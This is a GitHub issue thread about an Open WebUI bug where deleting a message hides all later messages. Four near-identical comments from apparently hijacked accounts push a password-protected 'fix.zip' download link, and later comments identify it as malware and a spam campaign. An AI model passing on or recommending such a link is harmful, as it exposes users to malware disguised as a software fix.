### ISSUE TITLE
bug: message delete issue

### ISSUE THREAD

**Issue by CookSleep** [open-webui/open-webui#4923]
# Bug Report

## Installation Method

Docker

## Environment

- **Open WebUI Version:** v0.3.15
- **Operating System:** Ubuntu 22.04
- **Browser (if applicable):** Edge 128.0.2739.42

**Confirmation:**

- [x] I have read and followed all the instructions provided in the README.md.
- [x] I am on the latest version of both Open WebUI and Ollama.
- [ ] I have included the browser console logs.
- [ ] I have included the Docker container logs.
- [x] I have provided the exact steps to reproduce the bug in the "Steps to Reproduce" section below.

## Expected Behavior:

When the delete message button is pressed, the selected message and its attached model reply will be deleted, while the subsequent messages will be retained and displayed.

## Actual Behavior:

The message is indeed deleted, but all subsequent messages are hidden. Only when you enter and send a new message will the remaining old messages after deletion appear in the old branch of the history.

## Description

**Bug Summary:**
1. Press the delete button of a message that is not the last message in the current conversation.
2. All subsequent messages are hidden
3. Enter a new message and send it, the remaining old messages after deletion will appear in the old branch of the history.

## Reproduction Details

**Steps to Reproduce:**
[Outline the steps to reproduce the bug. Be as detailed as possible.]

## Logs and Screenshots

**Screenshots/Screen Recordings**
Before pressing the delete button:
![image](https://github.com/user-attachments/assets/16f5fd16-6a5e-47eb-ac5c-6d6c5f9038f4)

After pressing the delete button for the message with content "3":
![image](https://github.com/user-attachments/assets/ba055b4c-0adc-4bad-a785-ddaa95f4fd43)

Enter a new message and send:
![image](https://github.com/user-attachments/assets/3636c23b-129a-4af0-94f7-d29b6012da04)

Press the button in the picture:
![image](https://github.com/user-attachments/assets/15ce39ca-f96e-47b2-b4bf-f155dd45bb17)

You can see that the "5", "6", and "7" after "3" that were not deleted have finally been restored:
![image](https://github.com/user-attachments/assets/54548748-2693-4e4f-925c-aa7c2bd6afe3)

## Additional Information

This bug made me previously think that when you press the delete button, all messages after the deleted message were also deleted, which would cause me to lose a lot of progress. I was deleting messages just to remove useless information from the history to reduce API call costs...

And now, in order to recover the messages that were not deleted but just hidden, I have to spend extra money to call the API...

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CookSleep** [comment]
Hello @tjbck ! Sorry to bother you! However, there are many bots in this issue sending compressed files containing viruses (I have extracted them in a virtual machine, and the antivirus software directly reported these files as code obfuscators). Please handle them! I have reported them on their personal pages, but it may take some time for GitHub to process them

**Comment by enricozao** [comment]
Yo, my account got leaked, idk how, but don't download anything. I've tried to delete all the comments, but there are hundreds

**Comment by justinh-rahb** [comment]
Looks like GitHub themselves have been removing some, but there's others they've missed. And it's been multiple accounts doing it, all similar messages. Somebody got their sights set on us.

**Comment by tjbck** [comment]
Should be fixed on dev!
